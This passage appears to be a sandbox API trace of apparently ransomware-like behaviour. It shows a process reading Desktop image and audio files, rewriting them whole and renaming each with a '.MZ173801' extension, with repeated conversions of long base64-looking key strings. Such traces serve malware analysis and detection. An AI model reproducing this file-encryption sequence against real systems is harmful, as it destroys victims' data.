lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.408] GetCurrentThreadId () returned 0x1358 [0123.408] GetCurrentThreadId () returned 0x1358 [0123.408] GetCurrentThreadId () returned 0x1358 [0123.408] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sNSbJ9-I2i0PpN.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\snsbj9-i2i0ppn.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.408] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.408] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.408] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3554 [0123.408] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.408] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3554, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3554, lpOverlapped=0x0) returned 1 [0123.409] CloseHandle (hObject=0x410) returned 1 [0123.409] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sNSbJ9-I2i0PpN.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\snsbj9-i2i0ppn.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.410] WriteFile (in: hFile=0x410, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x3554, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3554, lpOverlapped=0x0) returned 1 [0123.412] CloseHandle (hObject=0x410) returned 1 [0123.412] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\sNSbJ9-I2i0PpN.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\snsbj9-i2i0ppn.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\sNSbJ9-I2i0PpN.bmp.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\snsbj9-i2i0ppn.bmp.mz173801")) returned 1 [0123.412] GetCurrentThreadId () returned 0x1358 [0123.412] GetCurrentThreadId () returned 0x1358 [0123.412] GetCurrentThreadId () returned 0x1358 [0123.412] GetCurrentThreadId () returned 0x1358 [0123.412] GetCurrentThreadId () returned 0x1358 [0123.412] GetCurrentThreadId () returned 0x1358 [0123.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefb61df0, ftCreationTime.dwHighDateTime=0x1d5eca0, ftLastAccessTime.dwLowDateTime=0xd8509970, ftLastAccessTime.dwHighDateTime=0x1d5e4fc, ftLastWriteTime.dwLowDateTime=0xd8509970, ftLastWriteTime.dwHighDateTime=0x1d5e4fc, nFileSizeHigh=0x0, nFileSizeLow=0x126c8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="trdj59u.gif", cAlternateFileName="")) returned 1 [0123.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.412] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\trdj59u.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\trdj59u.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefb61df0, ftCreationTime.dwHighDateTime=0x1d5eca0, ftLastAccessTime.dwLowDateTime=0xd8509970, ftLastAccessTime.dwHighDateTime=0x1d5e4fc, ftLastWriteTime.dwLowDateTime=0xd8509970, ftLastWriteTime.dwHighDateTime=0x1d5e4fc, nFileSizeHigh=0x0, nFileSizeLow=0x126c8)) returned 1 [0123.413] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.413] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.413] GetCurrentThreadId () returned 0x1358 [0123.413] GetCurrentThreadId () returned 0x1358 [0123.413] GetCurrentThreadId () returned 0x1358 [0123.414] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.414] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.414] GetCurrentThreadId () returned 0x1358 [0123.414] GetCurrentThreadId () returned 0x1358 [0123.414] GetCurrentThreadId () returned 0x1358 [0123.414] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\trdj59u.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\trdj59u.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.414] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.414] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.414] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x126c8 [0123.414] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.414] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x126c8, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x126c8, lpOverlapped=0x0) returned 1 [0123.416] CloseHandle (hObject=0x410) returned 1 [0123.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\trdj59u.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\trdj59u.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.418] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x126c8, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x126c8, lpOverlapped=0x0) returned 1 [0123.420] CloseHandle (hObject=0x410) returned 1 [0123.420] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\trdj59u.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\trdj59u.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\trdj59u.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\trdj59u.gif.mz173801")) returned 1 [0123.421] GetCurrentThreadId () returned 0x1358 [0123.421] GetCurrentThreadId () returned 0x1358 [0123.421] GetCurrentThreadId () returned 0x1358 [0123.421] GetCurrentThreadId () returned 0x1358 [0123.421] GetCurrentThreadId () returned 0x1358 [0123.421] GetCurrentThreadId () returned 0x1358 [0123.421] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12594c0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xed082e60, ftLastAccessTime.dwHighDateTime=0x1d5e631, ftLastWriteTime.dwLowDateTime=0xed082e60, ftLastWriteTime.dwHighDateTime=0x1d5e631, nFileSizeHigh=0x0, nFileSizeLow=0x16a38, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="txD8odKDry6.wav", cAlternateFileName="TXD8OD~1.WAV")) returned 1 [0123.421] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.421] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.421] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\txD8odKDry6.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\txd8odkdry6.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12594c0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xed082e60, ftLastAccessTime.dwHighDateTime=0x1d5e631, ftLastWriteTime.dwLowDateTime=0xed082e60, ftLastWriteTime.dwHighDateTime=0x1d5e631, nFileSizeHigh=0x0, nFileSizeLow=0x16a38)) returned 1 [0123.422] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.422] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.422] GetCurrentThreadId () returned 0x1358 [0123.422] GetCurrentThreadId () returned 0x1358 [0123.422] GetCurrentThreadId () returned 0x1358 [0123.422] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 